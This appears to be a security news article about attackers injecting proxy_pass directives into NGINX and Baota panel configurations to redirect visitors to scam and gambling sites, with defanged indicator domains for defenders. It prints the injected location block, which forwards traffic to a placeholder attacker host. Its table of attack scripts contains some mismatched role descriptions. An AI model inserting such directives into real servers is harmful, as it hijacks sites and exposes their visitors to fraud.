A sophisticated campaign in which threat actors are stealthily compromising NGINX servers to redirect web traffic to malicious destinations.
The attackers, previously linked to “React2Shell” exploits, are now targeting NGINX configurations, specifically those using the Baota (BT) management panel, widely used in Asia.
How the Attack Works
Instead of installing traditional malware, these attackers modify the server’s legitimate configuration files.
By injecting malicious directives into NGINX’s location blocks, they can intercept user traffic and route it through attacker-controlled servers without the site owner noticing immediately.
The core of the attack relies on the proxy_pass directive. This standard NGINX feature is designed to forward traffic to backend servers (like a PHP application).
The campaign uses a straightforward, automated workflow involving several shell scripts:
| Script Name | Role | Primary Function | Target |
|---|---|---|---|
| zx.sh | The Orchestrator | Initializes environment and downloads required tools | Acts as entry point for the attack chain |
| bt.sh | Baota Injector | Scans for Baota panel configs and injects malicious code | Targets /www/server/panel/vhost/nginx |
| 4zdh.sh | Advanced Injection | Injects payload into NGINX configs after validation | Targets generic Linux NGINX installs |
| zdh.sh | Advanced Injection | Same as 4zdh.sh with config verification | Collects and uploads the hijacked domain list |
| ok.sh | Exfiltration | Acts as an entry point for the attack chain | Sends data to attacker C2 server |
However, the attackers reconfigure it to send users to their own malicious domains, such as gambling or scam sites.
They also use proxy_set_header to ensure the hijacked traffic retains legitimate-looking headers, making the redirection harder to detect in standard logs.
location /%PATH%/ {
set $fullurl "$scheme://$host$request_uri";
rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break;
proxy_set_header Host [Attacker_Domain];
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header User-Agent $http_user_agent;
proxy_set_header Referer $http_referer;
proxy_ssl_server_name on;
proxy_pass http://[Attacker_Domain];
}
The campaign heavily targets Asian Top-Level Domains (TLDs) like .in, .id, .th, and .bd, as well as government (.gov) and educational (.edu) websites.
Datadog Security Research advises administrators to check their NGINX configuration files for unexpected proxy_pass directives pointing to the following known malicious domains:
| Indicator Type | Value | Threat Category | Status | Notes |
|---|---|---|---|---|
| Domain | xzz.pier46[.]com | Suspected C2 / Malware Infrastructure | Active (unverified) | Observed in malicious campaign |
| Domain | ide.hashbank8[.]com | Suspected C2 / Malware Infrastructure | Active (unverified) | Used for attacker communications |
| Domain | th.cogicpt[.]org | Suspected C2 / Malware Infrastructure | Active (unverified) | Potential exfiltration endpoint |
Additionally, network logs showing traffic to IP 158.94.210[.]227 indicate active communication with the attackers’ infrastructure.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
